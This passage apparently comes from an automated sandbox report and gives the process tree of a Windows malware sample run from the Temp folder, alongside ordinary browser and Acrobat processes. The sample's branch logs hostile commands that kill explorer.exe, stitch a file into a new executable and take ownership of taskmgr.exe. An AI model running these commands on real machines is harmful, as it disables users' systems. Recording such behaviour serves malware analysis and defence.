    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /save 1699084438
    3⤵
    PID:6128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /protect 1699084438
  2⤵
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:3672
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:3900

C:\Windows\System32\wuapihost.exe
C:\Windows\System32\wuapihost.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4180

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
1⤵
PID:4960
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  PID:5368
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7EBA6F7DA760C12A7122C864ABC62128 --mojo-platform-channel-handle=2052 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:9364
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7D9A8A44062CDDDA82B898F3D2AD5E69 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:5484
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  PID:12712

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4776
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5732

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3672
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  PID:1652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.0.1821181655\302238081" -parentBuildID 20221007134813 -prefsHandle 1768 -prefMapHandle 1728 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4eaff152-cfc6-4915-9840-e34c20d810cb} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 1860 1b3479ee158 gpu
    3⤵
    PID:6056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.1.826996118\667921553" -parentBuildID 20221007134813 -prefsHandle 2292 -prefMapHandle 2288 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cad40c4-82c6-4c75-94d2-5af90c3617eb} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 2328 1b33b66e558 socket
    3⤵
    PID:5244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.2.588543752\1375567673" -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3284 -prefsLen 21012 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {599c1efb-2fc8-4b44-8514-bf697ba45c1f} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 3272 1b34b626a58 tab
    3⤵
    PID:6996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.4.986484423\368872445" -childID 3 -isForBrowser -prefsHandle 4088 -prefMapHandle 4084 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02a2b31e-2922-4174-a251-a95afbd60ca9} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 4104 1b34d45f558 tab
    3⤵
    PID:5572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.3.1000759001\1005160302" -childID 2 -isForBrowser -prefsHandle 3360 -prefMapHandle 3340 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c10a5fc-c4ca-47a9-a18c-2b3ef7e5d73f} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 3328 1b33b658458 tab
    3⤵
    PID:5820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.5.2104944290\1625169904" -childID 4 -isForBrowser -prefsHandle 1560 -prefMapHandle 4672 -prefsLen 26921 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6bbdc81c-6d8a-4ead-8a07-7ac13f221006} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 4676 1b34b770858 tab
    3⤵
    PID:8944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.6.1622964515\1202055311" -childID 5 -isForBrowser -prefsHandle 5100 -prefMapHandle 5116 -prefsLen 26921 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebfdd3cf-ad3b-49e2-af06-bd7f2a4d2f5c} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 5108 1b34caf6558 tab
    3⤵
    PID:10972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1652.7.723259441\545729827" -childID 6 -isForBrowser -prefsHandle 1560 -prefMapHandle 4672 -prefsLen 26921 -prefMapSize 232675 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8b49be8-4a60-4046-a66f-11f052470376} 1652 "\\.\pipe\gecko-crash-server-pipe.1652" 2996 1b34aab2b58 tab
    3⤵
    PID:9720

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
1⤵
PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8255e46f8,0x7ff8255e4708,0x7ff8255e4718
  2⤵
  PID:7144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
  2⤵
  PID:9956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:11020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:10520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:10512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:12228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:12220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:9008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
  2⤵
  PID:9948
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
  2⤵
  PID:11020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2720 /prefetch:2
  2⤵
  PID:13460
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,7223779791764650874,10030919308268330876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
  2⤵
  PID:13048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff825729758,0x7ff825729768,0x7ff825729778
  2⤵
  PID:6316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:9792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3136 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:1
  2⤵
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4124 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4328 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:9156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5704 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:12080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6052 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:11956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5956 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5952 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:1
  2⤵
  PID:11884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:1
  2⤵
  PID:828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:9880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:2
  2⤵
  PID:9772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:12564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5996 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:1
  2⤵
  PID:12892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:11060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:8
  2⤵
  PID:13352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3400 --field-trial-handle=1976,i,16846705112513206952,9346703866020190394,131072 /prefetch:2
  2⤵
  PID:9772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff825729758,0x7ff825729768,0x7ff825729778
  2⤵
  PID:6300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=2032,i,7769179024374111051,14728135731235638315,131072 /prefetch:8
  2⤵
  PID:9840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1696 --field-trial-handle=2032,i,7769179024374111051,14728135731235638315,131072 /prefetch:2
  2⤵
  PID:9832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff825729758,0x7ff825729768,0x7ff825729778
  2⤵
  PID:6324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2028,i,3935563335352026747,527591228552527465,131072 /prefetch:8
  2⤵
  PID:10068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=2028,i,3935563335352026747,527591228552527465,131072 /prefetch:2
  2⤵
  PID:9992

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /protect 1699084438
1⤵
- Executes dropped EXE
PID:5124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe+711867.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
  2⤵
  PID:5584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe 1699084438
  2⤵
  PID:6744
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe 1699084438
    3⤵
    PID:7568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
      4⤵
      PID:8360
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /killwindows 1699084438
      4⤵
      PID:8364
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /killwindows 1699084438
        5⤵
        
        PID:8360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        
        PID:8944
        
        C:\Windows\system32\takeown.exe
        
